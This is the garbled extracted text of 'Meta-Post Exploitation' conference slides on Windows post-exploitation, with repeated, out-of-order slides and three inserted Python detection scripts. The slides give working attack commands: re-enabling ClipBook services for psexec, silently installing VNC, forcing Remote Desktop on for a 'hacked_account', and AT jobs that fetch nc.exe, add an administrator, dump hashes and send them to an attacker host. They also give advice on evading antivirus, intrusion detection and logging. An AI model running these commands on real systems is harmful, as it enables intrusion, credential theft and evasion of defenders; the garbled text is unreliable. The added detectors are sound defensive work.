bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My
• What we want – Privileges or SIDs
• What we get – Access, Access, Access
• How we get it – Incognito vs. FUto
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature modification is basically securable object manipulation
  – Remember all those tokens and security descriptors
  – These can be modified programmatically and directly
• Not just through existing tools
  – Stealth / persistence requirements
• May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
  – PsExec: it's still cool (thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying local security policies
Slide 49
Feature Modification
• Enabling psexec
  – PsExec was a great, awesome remote shell/command tool
  – Everybody now disables ClipBook, which psexec requires (l4m3)
  – Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ username userpassword
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"
vnc.reg file contents:
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: a system controlling access to security doors
      – No command line way of modifying the system, need a GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
    • secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
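A defender-side check for the state the two files above produce, as an added example that is not part of the talk: it parses the .reg export and the secedit template (contents reconstructed from the slides) and flags a Terminal Server that has been switched on, logon rights granted to an account outside an assumed allow-list, and deny-logon rights that the template wipes.

```python
"""Audit the enable_ts.reg and fix_ts_policy.ini fragments from the slides.
Added example, not from the talk: the two file contents are reconstructed from
the slides, and ALLOWED_REMOTE (who may hold the RDP logon rights) is an
assumed allow-list that a real audit would take from the host's baseline."""
import re
from typing import Dict, List, Set

# Constructed sample: the enable_ts.reg shown on slide 54.
ENABLE_TS_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
'''

# Constructed sample: the fix_ts_policy.ini shown on slide 53.
FIX_TS_POLICY_INI = '''[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
'''

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
ALLOWED_REMOTE = {"administrators", "remote desktop users"}   # assumption
GRANT_RIGHTS = ("seremoteinteractivelogonright", "seinteractivelogonright")
DENY_RIGHTS = ("sedenyinteractivelogonright", "sedenyremoteinteractivelogonright",
               "sedenynetworklogonright")


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key: {value name: raw data}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def parse_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a secedit template into {section: {name (lower-cased): value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            name, _, value = line.partition("=")
            sections[current][name.strip().lower()] = value.strip()
    return sections


def dword(data: str, default: int) -> int:
    """Decode 'dword:0000000a' -> 10; anything else yields the default."""
    return int(data[6:], 16) if data.lower().startswith("dword:") else default


def audit_ts_reg(reg: Dict[str, Dict[str, str]]) -> List[str]:
    """Flag a .reg that switches Terminal Services on (slide 54's end state)."""
    vals = reg.get(TS_KEY, {})
    findings = []
    if dword(vals.get("fDenyTSConnections", ""), 1) == 0:
        findings.append("fDenyTSConnections cleared: Remote Desktop connections allowed")
    if dword(vals.get("TSEnabled", ""), 0) == 1:
        findings.append("TSEnabled set: Terminal Server enabled")
    return findings


def audit_privilege_rights(inf: Dict[str, Dict[str, str]], allowed: Set[str]) -> List[str]:
    """Flag RDP/interactive logon rights granted outside the allow-list and
    deny-logon rights that the template wipes (an empty right = nobody denied)."""
    rights = inf.get("Privilege Rights", {})
    findings = []
    for right in GRANT_RIGHTS:
        for acct in (a.strip() for a in rights.get(right, "").split(",")):
            if acct and acct.lower() not in allowed:
                findings.append(f"{right} granted to unexpected account {acct}")
    for right in DENY_RIGHTS:
        if right in rights and rights[right] == "":
            findings.append(f"{right} emptied: deny-logon restriction removed")
    return findings


def audit(reg_text: str, inf_text: str, allowed: Set[str] = ALLOWED_REMOTE) -> List[str]:
    return audit_ts_reg(parse_reg(reg_text)) + audit_privilege_rights(parse_inf(inf_text), allowed)


if __name__ == "__main__":
    for finding in audit(ENABLE_TS_REG, FIX_TS_POLICY_INI):
        print("FINDING:", finding)
```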
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Old-school techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – flow
  • Establish authenticated session
  • Determine the time on the target
  • Pass commands to the target to be run 1 min from now
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i use GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to attacker host
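Detection logic for the flow above (the service start types switched to auto on slide 50, and an AT job followed by a new local administrator on this slide), as an added example rather than a tool from the talk; the pipe-delimited records are constructed and already normalized, and the event IDs are the standard Windows System/Security log IDs (7040 service start type changed, 4698 scheduled task created, 4720 user created, 4732 member added to a local group).

```python
"""Correlate normalized Windows event records for the two things the AT flow
leaves behind: watched services switched back on (7040) and an AT job (4698,
task \\AtN as SYSTEM) followed by a new local administrator (4720 + 4732).
Added example, not tooling from the talk; the pipe-delimited records are
constructed here, real sources would be the System and Security logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class Event(NamedTuple):
    ts: datetime
    host: str
    event_id: int
    fields: Dict[str, str]


# Constructed records: "time|host|event_id|key=value;key=value"
SAMPLE_LOG = """\
2008-07-01 11:58:10|ws01|7040|service=ClipSrv;old=disabled;new=auto start
2008-07-01 11:58:11|ws01|7040|service=NetDDE;old=disabled;new=auto start
2008-07-01 11:59:40|ws01|4698|task=\\At1;account=NT AUTHORITY\\SYSTEM;command=tftp -i 10.0.0.9 GET e.bat
2008-07-01 12:00:05|ws01|4698|task=\\At2;account=NT AUTHORITY\\SYSTEM;command=e.bat
2008-07-01 12:01:02|ws01|4720|account=hacked;subject=SYSTEM
2008-07-01 12:01:03|ws01|4732|group=Administrators;member=hacked
2008-07-01 12:05:00|ws02|4698|task=\\Backup Nightly;account=svc_backup;command=backup.cmd
2008-07-01 12:07:00|ws02|7040|service=Spooler;old=auto start;new=disabled
2008-07-01 12:30:00|ws03|4720|account=jsmith;subject=helpdesk
"""

# Services the slides re-enable; normally disabled on a hardened host.
WATCHED_SERVICES = {"clipsrv", "netdde", "netddedsdm", "termservice"}
AT_TASK = re.compile(r"\\?at\d+$", re.IGNORECASE)   # AT jobs are named \At1, \At2, ...
AT_WINDOW = timedelta(minutes=5)


def parse_log(text: str) -> List[Event]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, eid, rest = line.split("|", 3)
        fields = dict(kv.split("=", 1) for kv in rest.split(";") if "=" in kv)
        events.append(Event(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, int(eid), fields))
    return sorted(events, key=lambda e: e.ts)


def detect_service_reenable(events: List[Event]) -> List[str]:
    """7040 changes that move a watched service away from 'disabled'."""
    alerts = []
    for e in events:
        if (e.event_id == 7040
                and e.fields.get("service", "").lower() in WATCHED_SERVICES
                and e.fields.get("new", "").lower() != "disabled"):
            alerts.append(f"{e.host}: {e.fields['service']} start type "
                          f"{e.fields.get('old')} -> {e.fields.get('new')}")
    return alerts


def detect_at_admin_chain(events: List[Event], window: timedelta = AT_WINDOW) -> List[str]:
    """AT job followed, within `window` on the same host, by a user being created
    and added to Administrators; one alert per (host, account)."""
    by_host: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        by_host[e.host].append(e)
    alerts, seen = [], set()
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            if e.event_id != 4698 or not AT_TASK.match(e.fields.get("task", "")):
                continue
            later = [x for x in evs[i + 1:] if x.ts - e.ts <= window]
            created = {x.fields.get("account") for x in later if x.event_id == 4720}
            admins = {x.fields.get("member") for x in later
                      if x.event_id == 4732 and x.fields.get("group", "").lower() == "administrators"}
            for acct in sorted(created & admins):
                if (host, acct) not in seen:
                    seen.add((host, acct))
                    alerts.append(f"{host}: AT job {e.fields['task']} at {e.ts:%H:%M:%S} "
                                  f"followed by new local admin '{acct}'")
    return alerts


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for alert in detect_service_reenable(evs) + detect_at_admin_chain(evs):
        print("ALERT:", alert)
```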
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – establish NetBIOS session credentials on a range of hosts
• MassWinenum – enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
  – Beyond EIP – the theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
  – Thanks to
    • All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore, especially for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 32
Stealth / Evading Detection
• Why stealth?
  – If you get caught, you get stopped
  – The longer you can operate undetected, the more you can accomplish
  – Admins won't fix problems they don't know exist (helps persistence)
  – On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
  – Keep system operable
    • If it breaks, you can't use it
    • Someone will come fix it
  – Operate without fear of detection
  – Robustness
    • Hiding shouldn't require constant attention
  – DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / existing tools
  – Rootkits, rootkits, rootkits
  – Meterpreter
  – Encryption
    • Shellcode encoders for IDS evasion
  – Log cleaners
  – Packers
  – Covert channels / steganography
  – Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different perspective
  – DON'T BE AN ANOMALY
  – Hide in plain sight
    • Many tools have ONLY malicious uses
    • Make your intent hard to determine
  – Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
  – Auditing of securable objects is controlled by SACLs
  – Null SACL = no auditing = no logs
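The slide's rule (a null or absent SACL means nothing on the object is audited) applied to a self-relative SECURITY_DESCRIPTOR blob, the form in which a defender sees descriptors dumped from a host; this is an added example, not from the talk, and the descriptors are constructed in the block with struct following the documented SECURITY_DESCRIPTOR_RELATIVE, ACL and ACE_HEADER layouts.

```python
"""Slide 37's rule (null or absent SACL = nothing audited) applied to a
self-relative SECURITY_DESCRIPTOR blob.  Added example, not from the talk; the
descriptors are constructed here with struct following the public
SECURITY_DESCRIPTOR_RELATIVE, ACL and ACE_HEADER layouts."""
import struct
from typing import List, Optional, Tuple

SE_SACL_PRESENT = 0x0010
SE_SELF_RELATIVE = 0x8000
SYSTEM_AUDIT_ACE_TYPE = 0x02
SUCCESSFUL_ACCESS_ACE_FLAG = 0x40
FAILED_ACCESS_ACE_FLAG = 0x80

# Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
SD_HEADER = struct.Struct("<BBHIIII")
# AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACL_HEADER = struct.Struct("<BBHHH")
# AceType, AceFlags, AceSize (followed by Mask and the SID for audit ACEs)
ACE_HEADER = struct.Struct("<BBH")


def parse_acl(blob: bytes, offset: int) -> List[Tuple[int, int, int]]:
    """Return (AceType, AceFlags, Mask) for every ACE in the ACL at `offset`."""
    _, _, _acl_size, ace_count, _ = ACL_HEADER.unpack_from(blob, offset)
    aces, pos = [], offset + ACL_HEADER.size
    for _ in range(ace_count):
        ace_type, ace_flags, ace_size = ACE_HEADER.unpack_from(blob, pos)
        (mask,) = struct.unpack_from("<I", blob, pos + ACE_HEADER.size)
        aces.append((ace_type, ace_flags, mask))
        pos += ace_size
    return aces


def audit_state(blob: bytes) -> str:
    """'no_sacl' (null or absent SACL: no auditing, no logs), 'empty_sacl'
    (SACL present but no audit ACEs) or 'audited:<n>' for n SYSTEM_AUDIT ACEs."""
    revision, _, control, _, _, off_sacl, _ = SD_HEADER.unpack_from(blob, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    if not control & SE_SACL_PRESENT or off_sacl == 0:
        return "no_sacl"
    audit_aces = [a for a in parse_acl(blob, off_sacl) if a[0] == SYSTEM_AUDIT_ACE_TYPE]
    return f"audited:{len(audit_aces)}" if audit_aces else "empty_sacl"


def build_sd(sacl: Optional[bytes]) -> bytes:
    """Constructed self-relative SD with no owner, group or DACL.  A null SACL
    keeps SE_SACL_PRESENT set but points at offset 0, which is the case the
    slide describes."""
    off_sacl = SD_HEADER.size if sacl is not None else 0
    header = SD_HEADER.pack(1, 0, SE_SELF_RELATIVE | SE_SACL_PRESENT, 0, 0, off_sacl, 0)
    return header + (sacl or b"")


def build_audit_sacl(mask: int) -> bytes:
    """SACL holding one SYSTEM_AUDIT_ACE for Everyone (S-1-1-0) that audits
    both successful and failed use of `mask`."""
    sid = bytes([1, 1]) + bytes([0, 0, 0, 0, 0, 1]) + struct.pack("<I", 0)
    flags = SUCCESSFUL_ACCESS_ACE_FLAG | FAILED_ACCESS_ACE_FLAG
    ace = (ACE_HEADER.pack(SYSTEM_AUDIT_ACE_TYPE, flags, ACE_HEADER.size + 4 + len(sid))
           + struct.pack("<I", mask) + sid)
    return ACL_HEADER.pack(2, 0, ACL_HEADER.size + len(ace), 1, 0) + ace


if __name__ == "__main__":
    print(audit_state(build_sd(None)))                        # no_sacl
    print(audit_state(build_sd(build_audit_sacl(0x1F01FF))))  # audited:1
```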
Slide 38
• DEMOS
  – Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
  – Target users
    • Who has access to what
    • Where is the data
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – su, sudo, ksu
  – Process injection
  – Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
